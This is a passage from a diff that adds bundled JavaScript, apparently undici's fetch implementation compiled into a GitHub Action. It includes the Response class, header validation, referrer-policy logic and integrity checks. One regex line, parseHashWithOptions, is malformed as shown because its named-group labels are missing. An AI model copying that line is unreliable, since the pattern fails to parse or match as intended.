isValidReasonPhrase, + isCancelled, + isAborted, + isBlobLike, + serializeJavascriptValueToJSONString, + isErrorLike, + isomorphicEncode +} = __nccwpck_require__(2538) +const { + redirectStatusSet, + nullBodyStatus, + DOMException +} = __nccwpck_require__(1037) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { FormData } = __nccwpck_require__(2015) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { types } = __nccwpck_require__(3837) + +const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) +const textEncoder = new TextEncoder('utf-8') + +// https://fetch.spec.whatwg.org/#response-class +class Response { + // Creates network error Response. + static error () { + // TODO + const relevantRealm = { settingsObject: {} } + + // The static error() method steps are to return the result of creating a + // Response object, given a new network error, "immutable", and this’s + // relevant Realm. + const responseObject = new Response() + responseObject[kState] = makeNetworkError() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response-json + static json (data, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) + + if (init !== null) { + init = webidl.converters.ResponseInit(init) + } + + // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. + const bytes = textEncoder.encode( + serializeJavascriptValueToJSONString(data) + ) + + // 2. Let body be the result of extracting bytes. + const body = extractBody(bytes) + + // 3. Let responseObject be the result of creating a Response object, given a new response, + // "response", and this’s relevant Realm. + const relevantRealm = { settingsObject: {} } + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'response' + responseObject[kHeaders][kRealm] = relevantRealm + + // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). + initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) + + // 5. Return responseObject. + return responseObject + } + + // Creates a redirect Response that redirects to url with status status. + static redirect (url, status = 302) { + const relevantRealm = { settingsObject: {} } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) + + url = webidl.converters.USVString(url) + status = webidl.converters['unsigned short'](status) + + // 1. Let parsedURL be the result of parsing url with current settings + // object’s API base URL. + // 2. If parsedURL is failure, then throw a TypeError. + // TODO: base-URL? + let parsedURL + try { + parsedURL = new URL(url, getGlobalOrigin()) + } catch (err) { + throw Object.assign(new TypeError('Failed to parse URL from ' + url), { + cause: err + }) + } + + // 3. If status is not a redirect status, then throw a RangeError. + if (!redirectStatusSet.has(status)) { + throw new RangeError('Invalid status code ' + status) + } + + // 4. Let responseObject be the result of creating a Response object, + // given a new response, "immutable", and this’s relevant Realm. + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Set responseObject’s response’s status to status. + responseObject[kState].status = status + + // 6. Let value be parsedURL, serialized and isomorphic encoded. + const value = isomorphicEncode(URLSerializer(parsedURL)) + + // 7. Append `Location`/value to responseObject’s response’s header list. + responseObject[kState].headersList.append('location', value) + + // 8. Return responseObject. + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response + constructor (body = null, init = {}) { + if (body !== null) { + body = webidl.converters.BodyInit(body) + } + + init = webidl.converters.ResponseInit(init) + + // TODO + this[kRealm] = { settingsObject: {} } + + // 1. Set this’s response to a new response. + this[kState] = makeResponse({}) + + // 2. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is this’s response’s header list and guard + // is "response". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kGuard] = 'response' + this[kHeaders][kHeadersList] = this[kState].headersList + this[kHeaders][kRealm] = this[kRealm] + + // 3. Let bodyWithType be null. + let bodyWithType = null + + // 4. If body is non-null, then set bodyWithType to the result of extracting body. + if (body != null) { + const [extractedBody, type] = extractBody(body) + bodyWithType = { body: extractedBody, type } + } + + // 5. Perform initialize a response given this, init, and bodyWithType. + initializeResponse(this, init, bodyWithType) + } + + // Returns response’s type, e.g., "cors". + get type () { + webidl.brandCheck(this, Response) + + // The type getter steps are to return this’s response’s type. + return this[kState].type + } + + // Returns response’s URL, if it has one; otherwise the empty string. + get url () { + webidl.brandCheck(this, Response) + + const urlList = this[kState].urlList + + // The url getter steps are to return the empty string if this’s + // response’s URL is null; otherwise this’s response’s URL, + // serialized with exclude fragment set to true. + const url = urlList[urlList.length - 1] ?? null + + if (url === null) { + return '' + } + + return URLSerializer(url, true) + } + + // Returns whether response was obtained through a redirect. + get redirected () { + webidl.brandCheck(this, Response) + + // The redirected getter steps are to return true if this’s response’s URL + // list has more than one item; otherwise false. + return this[kState].urlList.length > 1 + } + + // Returns response’s status. + get status () { + webidl.brandCheck(this, Response) + + // The status getter steps are to return this’s response’s status. + return this[kState].status + } + + // Returns whether response’s status is an ok status. + get ok () { + webidl.brandCheck(this, Response) + + // The ok getter steps are to return true if this’s response’s status is an + // ok status; otherwise false. + return this[kState].status >= 200 && this[kState].status <= 299 + } + + // Returns response’s status message. + get statusText () { + webidl.brandCheck(this, Response) + + // The statusText getter steps are to return this’s response’s status + // message. + return this[kState].statusText + } + + // Returns response’s headers as Headers. + get headers () { + webidl.brandCheck(this, Response) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + get body () { + webidl.brandCheck(this, Response) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Response) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + // Returns a clone of response. + clone () { + webidl.brandCheck(this, Response) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || (this.body && this.body.locked)) { + throw webidl.errors.exception({ + header: 'Response.clone', + message: 'Body has already been consumed.' + }) + } + + // 2. Let clonedResponse be the result of cloning this’s response. + const clonedResponse = cloneResponse(this[kState]) + + // 3. Return the result of creating a Response object, given + // clonedResponse, this’s headers’s guard, and this’s relevant Realm. + const clonedResponseObject = new Response() + clonedResponseObject[kState] = clonedResponse + clonedResponseObject[kRealm] = this[kRealm] + clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList + clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + return clonedResponseObject + } +} + +mixinBody(Response) + +Object.defineProperties(Response.prototype, { + type: kEnumerableProperty, + url: kEnumerableProperty, + status: kEnumerableProperty, + ok: kEnumerableProperty, + redirected: kEnumerableProperty, + statusText: kEnumerableProperty, + headers: kEnumerableProperty, + clone: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Response', + configurable: true + } +}) + +Object.defineProperties(Response, { + json: kEnumerableProperty, + redirect: kEnumerableProperty, + error: kEnumerableProperty +}) + +// https://fetch.spec.whatwg.org/#concept-response-clone +function cloneResponse (response) { + // To clone a response response, run these steps: + + // 1. If response is a filtered response, then return a new identical + // filtered response whose internal response is a clone of response’s + // internal response. + if (response.internalResponse) { + return filterResponse( + cloneResponse(response.internalResponse), + response.type + ) + } + + // 2. Let newResponse be a copy of response, except for its body. + const newResponse = makeResponse({ ...response, body: null }) + + // 3. If response’s body is non-null, then set newResponse’s body to the + // result of cloning response’s body. + if (response.body != null) { + newResponse.body = cloneBody(response.body) + } + + // 4. Return newResponse. + return newResponse +} + +function makeResponse (init) { + return { + aborted: false, + rangeRequested: false, + timingAllowPassed: false, + requestIncludesCredentials: false, + type: 'default', + status: 200, + timingInfo: null, + cacheState: '', + statusText: '', + ...init, + headersList: init.headersList + ? new HeadersList(init.headersList) + : new HeadersList(), + urlList: init.urlList ? [...init.urlList] : [] + } +} + +function makeNetworkError (reason) { + const isError = isErrorLike(reason) + return makeResponse({ + type: 'error', + status: 0, + error: isError + ? reason + : new Error(reason ? String(reason) : reason), + aborted: reason && reason.name === 'AbortError' + }) +} + +function makeFilteredResponse (response, state) { + state = { + internalResponse: response, + ...state + } + + return new Proxy(response, { + get (target, p) { + return p in state ? state[p] : target[p] + }, + set (target, p, value) { + assert(!(p in state)) + target[p] = value + return true + } + }) +} + +// https://fetch.spec.whatwg.org/#concept-filtered-response +function filterResponse (response, type) { + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (type === 'basic') { + // A basic filtered response is a filtered response whose type is "basic" + // and header list excludes any headers in internal response’s header list + // whose name is a forbidden response-header name. + + // Note: undici does not implement forbidden response-header names + return makeFilteredResponse(response, { + type: 'basic', + headersList: response.headersList + }) + } else if (type === 'cors') { + // A CORS filtered response is a filtered response whose type is "cors" + // and header list excludes any headers in internal response’s header + // list whose name is not a CORS-safelisted response-header name, given + // internal response’s CORS-exposed header-name list. + + // Note: undici does not implement CORS-safelisted response-header names + return makeFilteredResponse(response, { + type: 'cors', + headersList: response.headersList + }) + } else if (type === 'opaque') { + // An opaque filtered response is a filtered response whose type is + // "opaque", URL list is the empty list, status is 0, status message + // is the empty byte sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaque', + urlList: Object.freeze([]), + status: 0, + statusText: '', + body: null + }) + } else if (type === 'opaqueredirect') { + // An opaque-redirect filtered response is a filtered response whose type + // is "opaqueredirect", status is 0, status message is the empty byte + // sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaqueredirect', + status: 0, + statusText: '', + headersList: [], + body: null + }) + } else { + assert(false) + } +} + +// https://fetch.spec.whatwg.org/#appropriate-network-error +function makeAppropriateNetworkError (fetchParams, err = null) { + // 1. Assert: fetchParams is canceled. + assert(isCancelled(fetchParams)) + + // 2. Return an aborted network error if fetchParams is aborted; + // otherwise return a network error. + return isAborted(fetchParams) + ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) + : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) +} + +// https://whatpr.org/fetch/1392.html#initialize-a-response +function initializeResponse (response, init, body) { + // 1. If init["status"] is not in the range 200 to 599, inclusive, then + // throw a RangeError. + if (init.status !== null && (init.status < 200 || init.status > 599)) { + throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') + } + + // 2. If init["statusText"] does not match the reason-phrase token production, + // then throw a TypeError. + if ('statusText' in init && init.statusText != null) { + // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: + // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) + if (!isValidReasonPhrase(String(init.statusText))) { + throw new TypeError('Invalid statusText') + } + } + + // 3. Set response’s response’s status to init["status"]. + if ('status' in init && init.status != null) { + response[kState].status = init.status + } + + // 4. Set response’s response’s status message to init["statusText"]. + if ('statusText' in init && init.statusText != null) { + response[kState].statusText = init.statusText + } + + // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. + if ('headers' in init && init.headers != null) { + fill(response[kHeaders], init.headers) + } + + // 6. If body was given, then: + if (body) { + // 1. If response's status is a null body status, then throw a TypeError. + if (nullBodyStatus.includes(response.status)) { + throw webidl.errors.exception({ + header: 'Response constructor', + message: 'Invalid response status code ' + response.status + }) + } + + // 2. Set response's body to body's body. + response[kState].body = body.body + + // 3. If body's type is non-null and response's header list does not contain + // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. + if (body.type != null && !response[kState].headersList.contains('Content-Type')) { + response[kState].headersList.append('content-type', body.type) + } + } +} + +webidl.converters.ReadableStream = webidl.interfaceConverter( + ReadableStream +) + +webidl.converters.FormData = webidl.interfaceConverter( + FormData +) + +webidl.converters.URLSearchParams = webidl.interfaceConverter( + URLSearchParams +) + +// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit +webidl.converters.XMLHttpRequestBodyInit = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { + return webidl.converters.BufferSource(V) + } + + if (util.isFormDataLike(V)) { + return webidl.converters.FormData(V, { strict: false }) + } + + if (V instanceof URLSearchParams) { + return webidl.converters.URLSearchParams(V) + } + + return webidl.converters.DOMString(V) +} + +// https://fetch.spec.whatwg.org/#bodyinit +webidl.converters.BodyInit = function (V) { + if (V instanceof ReadableStream) { + return webidl.converters.ReadableStream(V) + } + + // Note: the spec doesn't include async iterables, + // this is an undici extension. + if (V?.[Symbol.asyncIterator]) { + return V + } + + return webidl.converters.XMLHttpRequestBodyInit(V) +} + +webidl.converters.ResponseInit = webidl.dictionaryConverter([ + { + key: 'status', + converter: webidl.converters['unsigned short'], + defaultValue: 200 + }, + { + key: 'statusText', + converter: webidl.converters.ByteString, + defaultValue: '' + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + } +]) + +module.exports = { + makeNetworkError, + makeResponse, + makeAppropriateNetworkError, + filterResponse, + Response, + cloneResponse +} + + +/***/ }), + +/***/ 5861: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kUrl: Symbol('url'), + kHeaders: Symbol('headers'), + kSignal: Symbol('signal'), + kState: Symbol('state'), + kGuard: Symbol('guard'), + kRealm: Symbol('realm') +} + + +/***/ }), + +/***/ 2538: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { performance } = __nccwpck_require__(4074) +const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) +const assert = __nccwpck_require__(9491) +const { isUint8Array } = __nccwpck_require__(9830) + +// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable +/** @type {import('crypto')|undefined} */ +let crypto + +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +function responseURL (response) { + // https://fetch.spec.whatwg.org/#responses + // A response has an associated URL. It is a pointer to the last URL + // in response’s URL list and null if response’s URL list is empty. + const urlList = response.urlList + const length = urlList.length + return length === 0 ? null : urlList[length - 1].toString() +} + +// https://fetch.spec.whatwg.org/#concept-response-location-url +function responseLocationURL (response, requestFragment) { + // 1. If response’s status is not a redirect status, then return null. + if (!redirectStatusSet.has(response.status)) { + return null + } + + // 2. Let location be the result of extracting header list values given + // `Location` and response’s header list. + let location = response.headersList.get('location') + + // 3. If location is a header value, then set location to the result of + // parsing location with response’s URL. + if (location !== null && isValidHeaderValue(location)) { + location = new URL(location, responseURL(response)) + } + + // 4. If location is a URL whose fragment is null, then set location’s + // fragment to requestFragment. + if (location && !location.hash) { + location.hash = requestFragment + } + + // 5. Return location. + return location +} + +/** @returns {URL} */ +function requestCurrentURL (request) { + return request.urlList[request.urlList.length - 1] +} + +function requestBadPort (request) { + // 1. Let url be request’s current URL. + const url = requestCurrentURL(request) + + // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, + // then return blocked. + if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { + return 'blocked' + } + + // 3. Return allowed. + return 'allowed' +} + +function isErrorLike (object) { + return object instanceof Error || ( + object?.constructor?.name === 'Error' || + object?.constructor?.name === 'DOMException' + ) +} + +// Check whether |statusText| is a ByteString and +// matches the Reason-Phrase token production. +// RFC 2616: https://tools.ietf.org/html/rfc2616 +// RFC 7230: https://tools.ietf.org/html/rfc7230 +// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" +// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 +function isValidReasonPhrase (statusText) { + for (let i = 0; i < statusText.length; ++i) { + const c = statusText.charCodeAt(i) + if ( + !( + ( + c === 0x09 || // HTAB + (c >= 0x20 && c <= 0x7e) || // SP / VCHAR + (c >= 0x80 && c <= 0xff) + ) // obs-text + ) + ) { + return false + } + } + return true +} + +/** + * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 + * @param {number} c + */ +function isTokenCharCode (c) { + switch (c) { + case 0x22: + case 0x28: + case 0x29: + case 0x2c: + case 0x2f: + case 0x3a: + case 0x3b: + case 0x3c: + case 0x3d: + case 0x3e: + case 0x3f: + case 0x40: + case 0x5b: + case 0x5c: + case 0x5d: + case 0x7b: + case 0x7d: + // DQUOTE and "(),/:;<=>?@[\]{}" + return false + default: + // VCHAR %x21-7E + return c >= 0x21 && c <= 0x7e + } +} + +/** + * @param {string} characters + */ +function isValidHTTPToken (characters) { + if (characters.length === 0) { + return false + } + for (let i = 0; i < characters.length; ++i) { + if (!isTokenCharCode(characters.charCodeAt(i))) { + return false + } + } + return true +} + +/** + * @see https://fetch.spec.whatwg.org/#header-name + * @param {string} potentialValue + */ +function isValidHeaderName (potentialValue) { + return isValidHTTPToken(potentialValue) +} + +/** + * @see https://fetch.spec.whatwg.org/#header-value + * @param {string} potentialValue + */ +function isValidHeaderValue (potentialValue) { + // - Has no leading or trailing HTTP tab or space bytes. + // - Contains no 0x00 (NUL) or HTTP newline bytes. + if ( + potentialValue.startsWith('\t') || + potentialValue.startsWith(' ') || + potentialValue.endsWith('\t') || + potentialValue.endsWith(' ') + ) { + return false + } + + if ( + potentialValue.includes('\0') || + potentialValue.includes('\r') || + potentialValue.includes('\n') + ) { + return false + } + + return true +} + +// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect +function setRequestReferrerPolicyOnRedirect (request, actualResponse) { + // Given a request request and a response actualResponse, this algorithm + // updates request’s referrer policy according to the Referrer-Policy + // header (if any) in actualResponse. + + // 1. Let policy be the result of executing § 8.1 Parse a referrer policy + // from a Referrer-Policy header on actualResponse. + + // 8.1 Parse a referrer policy from a Referrer-Policy header + // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. + const { headersList } = actualResponse + // 2. Let policy be the empty string. + // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. + // 4. Return policy. + const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') + + // Note: As the referrer-policy can contain multiple policies + // separated by comma, we need to loop through all of them + // and pick the first valid one. + // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy + let policy = '' + if (policyHeader.length > 0) { + // The right-most policy takes precedence. + // The left-most policy is the fallback. + for (let i = policyHeader.length; i !== 0; i--) { + const token = policyHeader[i - 1].trim() + if (referrerPolicyTokens.has(token)) { + policy = token + break + } + } + } + + // 2. If policy is not the empty string, then set request’s referrer policy to policy. + if (policy !== '') { + request.referrerPolicy = policy + } +} + +// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check +function crossOriginResourcePolicyCheck () { + // TODO + return 'allowed' +} + +// https://fetch.spec.whatwg.org/#concept-cors-check +function corsCheck () { + // TODO + return 'success' +} + +// https://fetch.spec.whatwg.org/#concept-tao-check +function TAOCheck () { + // TODO + return 'success' +} + +function appendFetchMetadata (httpRequest) { + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header + + // 1. Assert: r’s url is a potentially trustworthy URL. + // TODO + + // 2. Let header be a Structured Header whose value is a token. + let header = null + + // 3. Set header’s value to r’s mode. + header = httpRequest.mode + + // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. + httpRequest.headersList.set('sec-fetch-mode', header) + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header + // TODO +} + +// https://fetch.spec.whatwg.org/#append-a-request-origin-header +function appendRequestOriginHeader (request) { + // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. + let serializedOrigin = request.origin + + // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. + if (request.responseTainting === 'cors' || request.mode === 'websocket') { + if (serializedOrigin) { + request.headersList.append('origin', serializedOrigin) + } + + // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: + } else if (request.method !== 'GET' && request.method !== 'HEAD') { + // 1. Switch on request’s referrer policy: + switch (request.referrerPolicy) { + case 'no-referrer': + // Set serializedOrigin to `null`. + serializedOrigin = null + break + case 'no-referrer-when-downgrade': + case 'strict-origin': + case 'strict-origin-when-cross-origin': + // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. + if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { + serializedOrigin = null + } + break + case 'same-origin': + // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. + if (!sameOrigin(request, requestCurrentURL(request))) { + serializedOrigin = null + } + break + default: + // Do nothing. + } + + if (serializedOrigin) { + // 2. Append (`Origin`, serializedOrigin) to request’s header list. + request.headersList.append('origin', serializedOrigin) + } + } +} + +function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { + // TODO + return performance.now() +} + +// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info +function createOpaqueTimingInfo (timingInfo) { + return { + startTime: timingInfo.startTime ?? 0, + redirectStartTime: 0, + redirectEndTime: 0, + postRedirectStartTime: timingInfo.startTime ?? 0, + finalServiceWorkerStartTime: 0, + finalNetworkResponseStartTime: 0, + finalNetworkRequestStartTime: 0, + endTime: 0, + encodedBodySize: 0, + decodedBodySize: 0, + finalConnectionTimingInfo: null + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#policy-container +function makePolicyContainer () { + // Note: the fetch spec doesn't make use of embedder policy or CSP list + return { + referrerPolicy: 'strict-origin-when-cross-origin' + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container +function clonePolicyContainer (policyContainer) { + return { + referrerPolicy: policyContainer.referrerPolicy + } +} + +// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer +function determineRequestsReferrer (request) { + // 1. Let policy be request's referrer policy. + const policy = request.referrerPolicy + + // Note: policy cannot (shouldn't) be null or an empty string. + assert(policy) + + // 2. Let environment be request’s client. + + let referrerSource = null + + // 3. Switch on request’s referrer: + if (request.referrer === 'client') { + // Note: node isn't a browser and doesn't implement document/iframes, + // so we bypass this step and replace it with our own. + + const globalOrigin = getGlobalOrigin() + + if (!globalOrigin || globalOrigin.origin === 'null') { + return 'no-referrer' + } + + // note: we need to clone it as it's mutated + referrerSource = new URL(globalOrigin) + } else if (request.referrer instanceof URL) { + // Let referrerSource be request’s referrer. + referrerSource = request.referrer + } + + // 4. Let request’s referrerURL be the result of stripping referrerSource for + // use as a referrer. + let referrerURL = stripURLForReferrer(referrerSource) + + // 5. Let referrerOrigin be the result of stripping referrerSource for use as + // a referrer, with the origin-only flag set to true. + const referrerOrigin = stripURLForReferrer(referrerSource, true) + + // 6. If the result of serializing referrerURL is a string whose length is + // greater than 4096, set referrerURL to referrerOrigin. + if (referrerURL.toString().length > 4096) { + referrerURL = referrerOrigin + } + + const areSameOrigin = sameOrigin(request, referrerURL) + const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && + !isURLPotentiallyTrustworthy(request.url) + + // 8. Execute the switch statements corresponding to the value of policy: + switch (policy) { + case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) + case 'unsafe-url': return referrerURL + case 'same-origin': + return areSameOrigin ? referrerOrigin : 'no-referrer' + case 'origin-when-cross-origin': + return areSameOrigin ? referrerURL : referrerOrigin + case 'strict-origin-when-cross-origin': { + const currentURL = requestCurrentURL(request) + + // 1. If the origin of referrerURL and the origin of request’s current + // URL are the same, then return referrerURL. + if (sameOrigin(referrerURL, currentURL)) { + return referrerURL + } + + // 2. If referrerURL is a potentially trustworthy URL and request’s + // current URL is not a potentially trustworthy URL, then return no + // referrer. + if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { + return 'no-referrer' + } + + // 3. Return referrerOrigin. + return referrerOrigin + } + case 'strict-origin': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + case 'no-referrer-when-downgrade': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + + default: // eslint-disable-line + return isNonPotentiallyTrustWorthy ? 'no-referrer' : referrerOrigin + } +} + +/** + * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url + * @param {URL} url + * @param {boolean|undefined} originOnly + */ +function stripURLForReferrer (url, originOnly) { + // 1. Assert: url is a URL. + assert(url instanceof URL) + + // 2. If url’s scheme is a local scheme, then return no referrer. + if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { + return 'no-referrer' + } + + // 3. Set url’s username to the empty string. + url.username = '' + + // 4. Set url’s password to the empty string. + url.password = '' + + // 5. Set url’s fragment to null. + url.hash = '' + + // 6. If the origin-only flag is true, then: + if (originOnly) { + // 1. Set url’s path to « the empty string ». + url.pathname = '' + + // 2. Set url’s query to null. + url.search = '' + } + + // 7. Return url. + return url +} + +function isURLPotentiallyTrustworthy (url) { + if (!(url instanceof URL)) { + return false + } + + // If child of about, return true + if (url.href === 'about:blank' || url.href === 'about:srcdoc') { + return true + } + + // If scheme is data, return true + if (url.protocol === 'data:') return true + + // If file, return true + if (url.protocol === 'file:') return true + + return isOriginPotentiallyTrustworthy(url.origin) + + function isOriginPotentiallyTrustworthy (origin) { + // If origin is explicitly null, return false + if (origin == null || origin === 'null') return false + + const originAsURL = new URL(origin) + + // If secure, return true + if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { + return true + } + + // If localhost or variants, return true + if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || + (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || + (originAsURL.hostname.endsWith('.localhost'))) { + return true + } + + // If any other, return false + return false + } +} + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist + * @param {Uint8Array} bytes + * @param {string} metadataList + */ +function bytesMatch (bytes, metadataList) { + // If node is not built with OpenSSL support, we cannot check + // a request's integrity, so allow it by default (the spec will + // allow requests if an invalid hash is given, as precedence). + /* istanbul ignore if: only if node is built with --without-ssl */ + if (crypto === undefined) { + return true + } + + // 1. Let parsedMetadata be the result of parsing metadataList. + const parsedMetadata = parseMetadata(metadataList) + + // 2. If parsedMetadata is no metadata, return true. + if (parsedMetadata === 'no metadata') { + return true + } + + // 3. If parsedMetadata is the empty set, return true. + if (parsedMetadata.length === 0) { + return true + } + + // 4. Let metadata be the result of getting the strongest + // metadata from parsedMetadata. + const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) + // get the strongest algorithm + const strongest = list[0].algo + // get all entries that use the strongest algorithm; ignore weaker + const metadata = list.filter((item) => item.algo === strongest) + + // 5. For each item in metadata: + for (const item of metadata) { + // 1. Let algorithm be the alg component of item. + const algorithm = item.algo + + // 2. Let expectedValue be the val component of item. + let expectedValue = item.hash + + // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e + // "be liberal with padding". This is annoying, and it's not even in the spec. + + if (expectedValue.endsWith('==')) { + expectedValue = expectedValue.slice(0, -2) + } + + // 3. Let actualValue be the result of applying algorithm to bytes. + let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') + + if (actualValue.endsWith('==')) { + actualValue = actualValue.slice(0, -2) + } + + // 4. If actualValue is a case-sensitive match for expectedValue, + // return true. + if (actualValue === expectedValue) { + return true + } + + let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') + + if (actualBase64URL.endsWith('==')) { + actualBase64URL = actualBase64URL.slice(0, -2) + } + + if (actualBase64URL === expectedValue) { + return true + } + } + + // 6. Return false. + return false +} + +// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options +// https://www.w3.org/TR/CSP2/#source-list-syntax +// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 +const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata + * @param {string} metadata + */ +function parseMetadata (metadata) { + // 1. Let result be the empty set. + /** @type {{ algo: string, hash: string }[]} */ + const result = [] + + // 2. Let empty be equal to true. + let empty = true + + const supportedHashes = crypto.getHashes() + + // 3. For each token returned by splitting metadata on spaces: + for (const token of metadata.split(' ')) { + // 1. Set empty to false. + empty = false + + // 2. Parse token as a hash-with-options. + const parsedToken = parseHashWithOptions.exec(token) + + // 3. If token does not parse, continue to the next token. + if (parsedToken === null || parsedToken.groups === undefined) { + // Note: Chromium blocks the request at this point, but Firefox + // gives a warning that an invalid integrity was given. The + // correct behavior is to ignore these, and subsequently not + // check the integrity of the resource. + continue + } + + // 4. Let algorithm be the hash-algo component of token. + const algorithm = parsedToken.groups.algo + + // 5. If algorithm is a hash function recognized by the user + // agent, add the parsed token to result. + if (supportedHashes.includes(algorithm.toLowerCase())) { + result.push(parsedToken.groups) + } + } + + // 4. Return no metadata if empty is true, otherwise return result. + if (empty === true) { + return 'no metadata' + } + + return result +} + +// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request +function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { + // TODO +} + 